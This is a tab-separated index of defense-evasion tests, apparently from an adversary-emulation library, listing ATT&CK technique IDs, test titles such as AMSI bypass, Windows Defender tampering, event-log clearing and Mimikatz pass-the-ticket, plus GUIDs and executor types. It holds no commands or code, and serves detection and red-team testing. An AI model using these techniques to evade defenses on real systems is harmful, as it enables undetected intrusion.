353 defense-evasion T1112 Modify Registry 73 Flush Shimcache ecbd533e-b45d-4239-aeff-b857c6f6d68b command_prompt
354 defense-evasion T1112 Modify Registry 74 Disable Windows Remote Desktop Protocol 5f8e36de-37ca-455e-b054-a2584f043c06 command_prompt
355 defense-evasion T1112 Modify Registry 75 Enforce Smart Card Authentication Through Registry 4c4bf587-fe7f-448f-ba8d-1ecec9db88be command_prompt
356 defense-evasion T1112 Modify Registry 76 Requires the BitLocker PIN for Pre-boot authentication 26fc7375-a551-4336-90d7-3f2817564304 command_prompt
357 defense-evasion T1112 Modify Registry 77 Modify EnableBDEWithNoTPM Registry entry bacb3e73-8161-43a9-8204-a69fe0e4b482 command_prompt
358 defense-evasion T1112 Modify Registry 78 Modify UseTPM Registry entry 7c8c7bd8-0a5c-4514-a6a3-0814c5a98cf0 command_prompt
359 defense-evasion T1112 Modify Registry 79 Modify UseTPMPIN Registry entry 10b33fb0-c58b-44cd-8599-b6da5ad6384c command_prompt
360 defense-evasion T1112 Modify Registry 80 Modify UseTPMKey Registry entry c8480c83-a932-446e-a919-06a1fd1e512a command_prompt
361 defense-evasion T1112 Modify Registry 81 Modify UseTPMKeyPIN Registry entry 02d8b9f7-1a51-4011-8901-2d55cca667f9 command_prompt
362 defense-evasion T1112 Modify Registry 82 Modify EnableNonTPM Registry entry e672a340-a933-447c-954c-d68db38a09b1 command_prompt
363 defense-evasion T1112 Modify Registry 83 Modify UsePartialEncryptionKey Registry entry b5169fd5-85c8-4b2c-a9b6-64cc0b9febef command_prompt
364 defense-evasion T1112 Modify Registry 84 Modify UsePIN Registry entry 3ac0b30f-532f-43c6-8f01-fb657aaed7e4 command_prompt
365 defense-evasion T1112 Modify Registry 85 Abusing Windows TelemetryController Registry Key for Persistence 4469192c-2d2d-4a3a-9758-1f31d937a92b command_prompt
366 defense-evasion T1112 Modify Registry 86 Modify RDP-Tcp Initial Program Registry Entry c691cee2-8d17-4395-b22f-00644c7f1c2d command_prompt
367 defense-evasion T1112 Modify Registry 87 Abusing MyComputer Disk Cleanup Path for Persistence f2915249-4485-42e2-96b7-9bf34328d497 command_prompt
368 defense-evasion T1112 Modify Registry 88 Abusing MyComputer Disk Fragmentation Path for Persistence 3235aafe-b49d-451b-a1f1-d979fa65ddaf command_prompt
369 defense-evasion T1112 Modify Registry 89 Abusing MyComputer Disk Backup Path for Persistence 599f3b5c-0323-44ed-bb63-4551623bf675 command_prompt
370 defense-evasion T1112 Modify Registry 90 Adding custom paths for application execution 573d15da-c34e-4c59-a7d2-18f20d92dfa3 command_prompt
371 defense-evasion T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
372 defense-evasion T1027.001 Obfuscated Files or Information: Binary Padding 1 Pad Binary to Change Hash - Linux/macOS dd ffe2346c-abd5-4b45-a713-bf5f1ebd573a sh
373 defense-evasion T1027.001 Obfuscated Files or Information: Binary Padding 2 Pad Binary to Change Hash using truncate command - Linux/macOS e22a9e89-69c7-410f-a473-e6c212cd2292 sh
374 defense-evasion T1484.001 Domain Policy Modification: Group Policy Modification 1 LockBit Black - Modify Group policy settings -cmd 9ab80952-74ee-43da-a98c-1e740a985f28 command_prompt
375 defense-evasion T1484.001 Domain Policy Modification: Group Policy Modification 2 LockBit Black - Modify Group policy settings -Powershell b51eae65-5441-4789-b8e8-64783c26c1d1 powershell
376 defense-evasion T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
377 defense-evasion T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
378 defense-evasion T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 sh
379 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
380 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
381 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
382 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 1 Clear Logs e6abb60e-26b8-41da-8aae-0c35174b0967 command_prompt
383 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 2 Delete System Logs Using Clear-EventLog b13e9306-3351-4b4b-a6e8-477358b0b498 powershell
384 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 3 Clear Event Logs via VBA 1b682d84-f075-4f93-9a89-8a8de19ffd6e powershell
385 defense-evasion T1222 File and Directory Permissions Modification 1 Enable Local and Remote Symbolic Links via fsutil 6c4ac96f-d4fa-44f4-83ca-56d8f4a55c02 command_prompt
386 defense-evasion T1222 File and Directory Permissions Modification 2 Enable Local and Remote Symbolic Links via reg.exe 78bef0d4-57fb-417d-a67a-b75ae02ea3ab command_prompt
387 defense-evasion T1222 File and Directory Permissions Modification 3 Enable Local and Remote Symbolic Links via Powershell 6cd715aa-20ac-4be1-a8f1-dda7bae160bd powershell
388 defense-evasion T1134.002 Create Process with Token 1 Access Token Manipulation dbf4f5a9-b8e0-46a3-9841-9ad71247239e powershell
389 defense-evasion T1134.002 Create Process with Token 2 WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique ccf4ac39-ec93-42be-9035-90e2f26bcd92 powershell
390 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
391 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 2 Make and modify binary from C source (freebsd) dd580455-d84b-481b-b8b0-ac96f3b1dc4c sh
392 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
393 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 4 Set a SetUID flag on file (freebsd) 9be9b827-ff47-4e1b-bef8-217db6fb7283 sh
394 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 5 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
395 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 6 Set a SetGID flag on file (freebsd) 1f73af33-62a8-4bf1-bd10-3bea931f2c0d sh
396 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 7 Make and modify capabilities of a binary db53959c-207d-4000-9e7a-cd8eb417e072 sh
397 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 8 Provide the SetUID capability to a file 1ac3272f-9bcf-443a-9888-4b1d3de785c1 sh
398 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 9 Do reconnaissance for files that have the setuid bit set 8e36da01-cd29-45fd-be72-8a0fcaad4481 sh
399 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 10 Do reconnaissance for files that have the setgid bit set 3fb46e17-f337-4c14-9f9a-a471946533e2 sh
400 defense-evasion T1218.008 Signed Binary Proxy Execution: Odbcconf 1 Odbcconf.exe - Execute Arbitrary DLL 2430498b-06c0-4b92-a448-8ad263c388e2 command_prompt
401 defense-evasion T1218.008 Signed Binary Proxy Execution: Odbcconf 2 Odbcconf.exe - Load Response File 331ce274-f9c9-440b-9f8c-a1006e1fce0b command_prompt
402 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 1 Auditing Configuration Changes on Linux Host 212cfbcf-4770-4980-bc21-303e37abd0e3 bash
403 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 2 Auditing Configuration Changes on FreeBSD Host cedaf7e7-28ee-42ab-ba13-456abd35d1bd sh
404 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 3 Logging Configuration Changes on Linux Host 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c bash
405 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 4 Logging Configuration Changes on FreeBSD Host 6b8ca3ab-5980-4321-80c3-bcd77c8daed8 sh
406 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 5 Disable Powershell ETW Provider - Windows 6f118276-121d-4c09-bb58-a8fb4a72ee84 powershell
407 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 6 Disable .NET Event Tracing for Windows Via Registry (cmd) 8a4c33be-a0d3-434a-bee6-315405edbd5b command_prompt
408 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 7 Disable .NET Event Tracing for Windows Via Registry (powershell) 19c07a45-452d-4620-90ed-4c34fffbe758 powershell
409 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 8 LockBit Black - Disable the ETW Provider of Windows Defender -cmd f6df0b8e-2c83-44c7-ba5e-0fa4386bec41 command_prompt
410 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 9 LockBit Black - Disable the ETW Provider of Windows Defender -Powershell 69fc085b-5444-4879-8002-b24c8e1a3e02 powershell
411 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 10 Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd fdac1f79-b833-4bab-b4a1-11b1ed676a4b command_prompt
412 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 11 Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell b42c1f8c-399b-47ae-8fd8-763181395fee powershell
413 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 12 Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd 110b4281-43fe-405f-a184-5d8eaf228ebf command_prompt
414 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 13 Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell 4d61779d-be7f-425c-b560-0cafb2522911 powershell
415 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 14 Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table 1174b5df-2c33-490f-8854-f5eb80c907ca powershell
416 defense-evasion T1070 Indicator Removal on Host 1 Indicator Removal using FSUtil b4115c7a-0e92-47f0-a61e-17e7218b2435 command_prompt
417 defense-evasion T1070 Indicator Removal on Host 2 Indicator Manipulation using FSUtil 96e86706-6afd-45b6-95d6-108d23eaf2e9 powershell
418 defense-evasion T1550.003 Use Alternate Authentication Material: Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
419 defense-evasion T1550.003 Use Alternate Authentication Material: Pass the Ticket 2 Rubeus Kerberos Pass The Ticket a2fc4ec5-12c6-4fb4-b661-961f23f359cb powershell
420 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 1 Creating W32Time similar named service using schtasks f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 command_prompt
421 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 2 Creating W32Time similar named service using sc b721c6ef-472c-4263-a0d9-37f1f4ecff66 command_prompt
422 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 3 linux rename /proc/pid/comm using prctl f0e3aaea-5cd9-4db6-a077-631dd19b27a8 sh
423 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 4 Hiding a malicious process with bind mounts ad4b73c2-d6e2-4d8b-9868-4c6f55906e01 sh
424 defense-evasion T1055.004 Process Injection: Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
425 defense-evasion T1055.004 Process Injection: Asynchronous Procedure Call 2 EarlyBird APC Queue Injection in Go 73785dd2-323b-4205-ab16-bb6f06677e14 powershell
426 defense-evasion T1055.004 Process Injection: Asynchronous Procedure Call 3 Remote Process Injection with Go using NtQueueApcThreadEx WinAPI 4cc571b1-f450-414a-850f-879baf36aa06 powershell
427 defense-evasion T1647 Plist File Modification 1 Plist Modification 394a538e-09bb-4a4a-95d1-b93cf12682a8 manual
428 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 1 Mount ISO image 002cca30-4778-4891-878a-aaffcfa502fa powershell
429 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 2 Mount an ISO image and run executable from the ISO 42f22b00-0242-4afc-a61b-0da05041f9cc powershell
430 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 3 Remove the Zone.Identifier alternate data stream 64b12afc-18b8-4d3f-9eab-7f6cae7c73f9 powershell
431 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 4 Execute LNK file from ISO c2587b8d-743d-4985-aa50-c83394eaeb68 powershell
432 defense-evasion T1612 Build Image on Host 1 Build Image On Host 2db30061-589d-409b-b125-7b473944f9b3 sh
433 defense-evasion T1055.002 Process Injection: Portable Executable Injection 1 Portable Executable Injection 578025d5-faa9-4f6d-8390-aae739d503e1 powershell
434 defense-evasion T1562.010 Impair Defenses: Downgrade Attack 1 ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI 062f92c9-28b1-4391-a5f8-9d8ca6852091 powershell
435 defense-evasion T1562.010 Impair Defenses: Downgrade Attack 2 ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI 14d55b96-b2f5-428d-8fed-49dc4d9dd616 command_prompt
436 defense-evasion T1562.010 Impair Defenses: Downgrade Attack 3 PowerShell Version 2 Downgrade 47c96489-2f55-4774-a6df-39faff428f6f powershell
437 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 1 Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject 1483fab9-4f52-4217-a9ce-daa9d7747cae command_prompt
438 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 2 Mshta executes VBScript to execute malicious command 906865c3-e05f-4acc-85c4-fbc185455095 command_prompt
439 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 3 Mshta Executes Remote HTML Application (HTA) c4b97eeb-5249-4455-a607-59f95485cb45 powershell
440 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 4 Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement 007e5672-2088-4853-a562-7490ddc19447 powershell
441 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 5 Invoke HTML Application - Jscript Engine Simulating Double Click 58a193ec-131b-404e-b1ca-b35cf0b18c33 powershell
442 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 6 Invoke HTML Application - Direct download from URI 39ceed55-f653-48ac-bd19-aceceaf525db powershell
443 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 7 Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler e7e3a525-7612-4d68-a5d3-c4649181b8af powershell
444 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 8 Invoke HTML Application - JScript Engine with Inline Protocol Handler d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 powershell
445 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 9 Invoke HTML Application - Simulate Lateral Movement over UNC Path b8a8bdb2-7eae-490d-8251-d5e0295b2362 powershell
446 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 10 Mshta used to Execute PowerShell 8707a805-2b76-4f32-b1c0-14e558205772 command_prompt
447 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
448 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 2 `SeDebugPrivilege` token duplication 34f0a430-9d04-4d98-bcb5-1989f14719f0 powershell
449 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 3 Launch NSudo Executable 7be1bc0f-d8e5-4345-9333-f5f67d742cb9 powershell
450 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 4 Bad Potato 9c6d799b-c111-4749-a42f-ec2f8cb51448 powershell
451 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 5 Juicy Potato f095e373-b936-4eb4-8d22-f47ccbfbe64a powershell
452 defense-evasion T1564.002 Hide Artifacts: Hidden Users 1 Create Hidden User using UniqueID < 500 4238a7f0-a980-4fff-98a2-dfc0a363d507 sh
453 defense-evasion T1564.002 Hide Artifacts: Hidden Users 2 Create Hidden User using IsHidden option de87ed7b-52c3-43fd-9554-730f695e7f31 sh
454 defense-evasion T1564.002 Hide Artifacts: Hidden Users 3 Create Hidden User in Registry 173126b7-afe4-45eb-8680-fa9f6400431c command_prompt
455 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 1 Disable history collection 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 sh
456 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 2 Disable history collection (freebsd) cada55b4-8251-4c60-819e-8ec1b33c9306 sh
457 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 3 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
458 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 4 Clear bash history 878794f7-c511-4199-a950-8c28b3ed8e5b bash
459 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 5 Setting the HISTCONTROL environment variable 10ab786a-028e-4465-96f6-9e83ca6c5f24 bash
460 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 6 Setting the HISTFILESIZE environment variable 5cafd6c1-2f43-46eb-ac47-a5301ba0a618 bash
461 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 7 Setting the HISTSIZE environment variable 386d3850-2ce7-4508-b56b-c0558922c814 sh
462 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 8 Setting the HISTFILE environment variable b3dacb6c-a9e3-44ec-bf87-38db60c5cad1 bash
463 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 9 Setting the HISTFILE environment variable (freebsd) f7308845-6da8-468e-99f2-4271f2f5bb67 sh
464 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 10 Setting the HISTIGNORE environment variable f12acddb-7502-4ce6-a146-5b62c59592f1 bash
465 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 11 Disable Windows Command Line Auditing using reg.exe 1329d5ab-e10e-4e5e-93d1-4d907eb656e5 command_prompt
466 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 12 Disable Windows Command Line Auditing using Powershell Cmdlet 95f5c72f-6dfe-45f3-a8c1-d8faa07176fa powershell
467 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 1 Parent PID Spoofing using PowerShell 069258f4-2162-46e9-9a25-c9c6c56150d2 powershell
468 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 2 Parent PID Spoofing - Spawn from Current Process 14920ebd-1d61-491a-85e0-fe98efe37f25 powershell
469 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 3 Parent PID Spoofing - Spawn from Specified Process cbbff285-9051-444a-9d17-c07cd2d230eb powershell
470 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 4 Parent PID Spoofing - Spawn from svchost.exe e9f2b777-3123-430b-805d-5cedc66ab591 powershell
471 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
472 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 1 Compiled HTML Help Local Payload 5cb87818-0d7c-4469-b7ef-9224107aebe8 command_prompt
473 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 2 Compiled HTML Help Remote Payload 0f8af516-9818-4172-922b-42986ef1e81d command_prompt
474 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 3 Invoke CHM with default Shortcut Command Execution 29d6f0d7-be63-4482-8827-ea77126c1ef7 powershell
475 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 4 Invoke CHM with InfoTech Storage Protocol Handler b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 powershell
476 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 5 Invoke CHM Simulate Double click 5decef42-92b8-4a93-9eb2-877ddcb9401a powershell
477 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 6 Invoke CHM with Script Engine and Help Topic 4f83adda-f5ec-406d-b318-9773c9ca92e5 powershell
478 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 7 Invoke CHM Shortcut Command with ITS and Help Topic 15756147-7470-4a83-87fb-bb5662526247 powershell
479 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 8 Decompile Local CHM File 20cb05e0-1fa5-406d-92c1-84da4ba01813 command_prompt
480 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 1 Add Network Share 14c38f32-6509-46d8-ab43-d53e32d2b131 command_prompt
481 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 2 Remove Network Share 09210ad5-1ef2-4077-9ad3-7351e13e9222 command_prompt
482 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 3 Remove Network Share PowerShell 0512d214-9512-4d22-bde7-f37e058259b3 powershell
483 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 4 Disable Administrative Share Creation at Startup 99c657aa-ebeb-4179-a665-69288fdd12b8 command_prompt
484 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 5 Remove Administrative Shares 4299eff5-90f1-4446-b2f3-7f4f5cfd5d62 command_prompt
485 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 1 Disable syslog 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 sh
486 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 2 Disable syslog (freebsd) db9de996-441e-4ae0-947b-61b6871e2fdf sh
487 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 3 Disable Cb Response ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 sh
488 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 4 Disable SELinux fc225f36-9279-4c39-b3f9-5141ab74f8d8 sh
489 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 5 Stop Crowdstrike Falcon on Linux 828a1278-81cc-4802-96ab-188bf29ca77d sh
490 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 6 Disable Carbon Black Response 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c sh
491 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 7 Disable LittleSnitch 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 sh
492 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 8 Disable OpenDNS Umbrella 07f43b33-1e15-4e99-be70-bc094157c849 sh
493 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 9 Disable macOS Gatekeeper 2a821573-fb3f-4e71-92c3-daac7432f053 sh
494 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 10 Stop and unload Crowdstrike Falcon on macOS b3e7510c-2d4c-4249-a33f-591a2bc83eef sh
495 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 11 Unload Sysmon Filter Driver 811b3e76-c41b-430c-ac0d-e2380bfaa164 command_prompt
496 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 12 Uninstall Sysmon a316fb2e-5344-470d-91c1-23e15c374edc command_prompt
497 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 13 AMSI Bypass - AMSI InitFailed 695eed40-e949-40e5-b306-b4031e4154bd powershell
498 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 14 AMSI Bypass - Remove AMSI Provider Reg Key 13f09b91-c953-438e-845b-b585e51cac9b powershell
499 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 15 Disable Arbitrary Security Windows Service a1230893-56ac-4c81-b644-2108e982f8f5 command_prompt
500 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 16 Tamper with Windows Defender ATP PowerShell 6b8df440-51ec-4d53-bf83-899591c9b5d7 powershell
501 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 17 Tamper with Windows Defender Command Prompt aa875ed4-8935-47e2-b2c5-6ec00ab220d2 command_prompt
502 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 18 Tamper with Windows Defender Registry 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45 powershell
503 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 19 Disable Microsoft Office Security Features 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7 powershell
504 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 20 Remove Windows Defender Definition Files 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 command_prompt
505 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 21 Stop and Remove Arbitrary Security Windows Service ae753dda-0f15-4af6-a168-b9ba16143143 powershell
506 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 22 Uninstall Crowdstrike Falcon on Windows b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297 powershell
507 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 23 Tamper with Windows Defender Evade Scanning -Folder 0b19f4ee-de90-4059-88cb-63c800c683ed powershell
508 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 24 Tamper with Windows Defender Evade Scanning -Extension 315f4be6-2240-4552-b3e1-d1047f5eecea powershell
509 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 25 Tamper with Windows Defender Evade Scanning -Process a123ce6a-3916-45d6-ba9c-7d4081315c27 powershell
510 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 26 office-365-Disable-AntiPhishRule b9bbae2c-2ba6-4cf3-b452-8e8f908696f3 powershell
511 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 27 Disable Windows Defender with DISM 871438ac-7d6e-432a-b27d-3e7db69faf58 command_prompt
512 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 28 Disable Defender Using NirSoft AdvancedRun 81ce22fd-9612-4154-918e-8a1f285d214d powershell
513 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 29 Kill antimalware protected processes using Backstab 24a12b91-05a7-4deb-8d7f-035fa98591bc powershell
514 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 30 WinPwn - Kill the event log services for stealth 7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66 powershell
515 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 31 Tamper with Windows Defender ATP using Aliases - PowerShell c531aa6e-9c97-4b29-afee-9b7be6fc8a64 powershell
516 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 32 LockBit Black - Disable Privacy Settings Experience Using Registry -cmd d6d22332-d07d-498f-aea0-6139ecb7850e command_prompt
517 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 33 LockBit Black - Use Registry Editor to turn on automatic logon -cmd 9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70 command_prompt
518 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 34 LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell d8c57eaa-497a-4a08-961e-bd5efd7c9374 powershell
519 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 35 Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell 5e27f36d-5132-4537-b43b-413b0d5eec9a powershell
520 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 36 Disable Windows Defender with PwSh Disable-WindowsOptionalFeature f542ffd3-37b4-4528-837f-682874faa012 powershell
521 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 37 WMIC Tamper with Windows Defender Evade Scanning Folder 59d386fc-3a4b-41b8-850d-9e3eee24dfe4 command_prompt
522 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 38 Delete Windows Defender Scheduled Tasks 4b841aa1-0d05-4b32-bbe7-7564346e7c76 command_prompt
523 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 39 Clear History 23b88394-091b-4968-a42d-fb8076992443 sh
524 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 40 Suspend History 94f6a1c9-aae7-46a4-9083-2bb1f5768ec4 sh
525 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 41 Reboot Linux Host via Kernel System Request 6d6d3154-1a52-4d1a-9d51-92ab8148b32e sh
526 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 42 Clear Pagging Cache f790927b-ea85-4a16-b7b2-7eb44176a510 sh
527 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 43 Disable Memory Swap e74e4c63-6fde-4ad2-9ee8-21c3a1733114 sh
528 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 44 Disable Hypervisor-Enforced Code Integrity (HVCI) 70bd71e6-eba4-4e00-92f7-617911dbe020 powershell
529 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 45 AMSI Bypass - Override AMSI via COM 17538258-5699-4ff1-92d1-5ac9b0dc21f5 command_prompt
530 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 46 AWS - GuardDuty Suspension or Deletion 11e65d8d-e7e4-470e-a3ff-82bc56ad938e bash
531 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 47 Tamper with Defender ATP on Linux/MacOS 40074085-dbc8-492b-90a3-11bcfc52fda8 sh
532 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 48 Tamper with Windows Defender Registry - Reg.exe 1f6743da-6ecc-4a93-b03f-dc357e4b313f command_prompt
